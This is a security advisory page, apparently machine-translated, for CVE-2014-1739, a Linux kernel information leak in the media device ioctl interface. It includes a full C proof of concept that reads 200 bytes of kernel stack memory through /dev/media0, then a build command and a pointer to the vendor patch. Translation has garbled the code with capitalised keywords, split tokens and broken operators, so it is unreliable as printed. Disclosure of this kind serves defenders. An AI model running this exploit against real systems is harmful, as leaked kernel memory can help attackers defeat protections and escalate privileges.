Linux Kernel '/drivers/media/media-device.c' Local Information Leakage Vulnerability

Linux Kernel '/drivers/media/media-device.c' Local Information Leakage Vulnerability

Release date:
Updated on:

Affected Systems:
Linux kernel 2.6.38-3.15-rc2
Description:
--------------------------------------------------------------------------------
Bugtraq id: 68048
CVE (CAN) ID: CVE-2014-1739
 
Linux Kernel is the Kernel of the Linux operating system.
 
Linux kernel 2.6.38-3.15-rc2 has the local information leakage vulnerability in the media_device_enum_entities () implementation. Local attackers can exploit this vulnerability to obtain sensitive memory information of kstack bytes on x86_32.
 
<* Source: Salva Peir & #195; 3
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
/*
* $ File: media-enum-poc.c
* $ Description: CVE-2014-1739: Infoleak PoC in media_device_enum_entities () leaking 200 kstack bytes on x86_32.
* $ Author: Salva Peir ó <speirofr@gmail.com> (c) Copyright 2014.
* $ URL: http://speirofr.appspot.com/files/media-enum-poc.c
* $ License: GPLv2.
*/
 
# Include <stdio. h>
# Include <fcntl. h>
# Include <string. h>
# Include <stdint. h>
 
# Include <sys/ioctl. h>
# Include <linux/media. h>
# Define MEDIA_DEV "/dev/media0"
 
Int main (int argc, char * argv [])
{
Struct media_entity_desc u_ent = {};
Char * file = MEDIA_DEV;
Int I, fd, ret;
 
If (argc> 1)
File = argv [1];
Fd = open (file, O_RDONLY );
If (fd <0 ){
Perror ("open" MEDIA_DEV );
Return-1;
}
 
U_ent.id = 0 | MEDIA_ENT_ID_FLAG_NEXT;
Ret = ioctl (fd, MEDIA_IOC_ENUM_ENTITIES, & u_ent );
If (ret <0 ){
Perror ("ioctl" MEDIA_DEV );
Return-1;
}
 
Printf ("[*] CVE-2014-1739: Infoleak PoC in media_device_enum_entities () leaking % d kstack bytes:", sizeof (u_ent.reserved) + sizeof (u_ent.raw ));
For (I = 0; I <200/sizeof (uint32_t); I ++ ){
Uint32_t data = * (uint32_t *) (uint32_t *) & u_ent.reserved + I );
If (I % 4 = 0)
Printf ("\ n % 08d:", I );
Printf ("0x % 08x", data );
}
Printf ("\ n ");
 
Return ret;
}
 
/*
Gcc-Wall-g-m32 media-enum-poc.c-o media-enum-poc #*/

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
Linux
-----
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
 
Http://www.kernel.org/

How to install Linux 3.11 Kernel on Ubuntu

The Ubuntu 13.10 (Saucy Salamander) Kernel has been upgraded to Linux Kernel 3.10 RC5

Linux Kernel 3.4.62 LTS is now available for download

How to install Linux kernel 13.10 On Ubuntu 3.12

Linux Kernel: click here
Linux Kernel: click here

This article permanently updates the link address: